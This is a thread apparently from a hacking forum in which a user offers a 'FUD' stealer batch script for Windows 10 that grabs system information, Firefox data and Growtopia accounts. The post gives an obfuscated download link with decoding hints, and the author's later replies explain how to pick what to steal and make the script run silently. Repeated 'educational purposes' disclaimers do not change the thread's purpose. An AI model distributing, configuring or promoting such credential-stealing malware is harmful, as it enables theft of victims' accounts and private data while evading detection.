ALERT!
Click here to register with a few steps and explore all our cool stuff we have to offer!

Photo

[2021 LATEST] FUD Stealer for the latest Windows 10 | Full system info, Firefox, Growtopia etc.

• Please log in to reply
[2021 LATEST] FUD Stealer for the latest Windows 10 | Full system info, Firefox, Growtopia etc.

TKVI
TKVI
    Rep
    Takaovi

Threads: 15
Credits: 1

Five years registered

Hidden Content
You'll be able to see the hidden content once you reply to this topic or upgrade your account.

For nonupgraded users too lazy to reply, you can also get the download URL by decoding this string... (It's not hard, 3 steps, R,B,H) Goodluck! smile.png

IzNgUjNgMmNgEjNgUjNgQzNgMTNggjNgMjNgQzNgEjNgIDNgYmMgkjNgYzNgYmNgEjNgImNgEjNgQTNgYmMgQmNgYmNgMjNgUmMgIjNgUzNggjNgQzNgkjNgcjNgYmMgYmMgE2MgMzNgAzNgQzNgQzNggjN

In case of an investigation by any federal entity or similar, I do not have any involvement with this community or with the people in it, I do not know how I am here, probably added by a third party,

I do not support any actions by the member of this community and all my posts are for educational purposes.

cakefier
cakefier
    Rep

Threads: 0
Credits: 0
Three years registered

nice

HeyyyMan
HeyyyMan
    Rep
    Lurker

Three years registered

HeyyyMan

BUL33T
BUL33T
    Rep
    Lurker

• Pip
Three years registered

cool

TKVI
TKVI
    Rep
    Takaovi

Five years registered

didn

bro it didn't worked for me

Hey man, you probably forgot to remove the GOTO lines. There's one at the start, then multiple throughout the whole code. I used them to give you options on what to steal. If you want to steal let's say the computer information, you'd remove the line 28. Hopefully you get it working :)

Make sure you also have the latest Windows 10.

In case of an investigation by any federal entity or similar, I do not have any involvement with this community or with the people in it, I do not know how I am here, probably added by a third party,

I do not support any actions by the member of this community and all my posts are for educational purposes.

Atsco
Atsco
    Rep
    Junkie

Threads: 16
Three years registered

Let's get it.

TKVI
TKVI
    Rep
    Takaovi

Five years registered

didn

bro it didn't worked for me

Just to let you know I've just updated the file. It had my old debug "pause" command on Firefox. If you tried to capture it, the script wouldn't have gotten to the end. The batch file is now completely silent too.

TKVI
TKVI
    Rep
    Takaovi

Five years registered

moro

Moro. Can only speak English on the forum, but wanted to let you know that I've updated the script since you downloaded it. Did minor improvements.

lustycom
lustycom
    Rep

Threads: 17

Deal with caution
User has an open scam report.
Four years registered

Hope i can get some

BobbyWassabi
BobbyWassabi
    Rep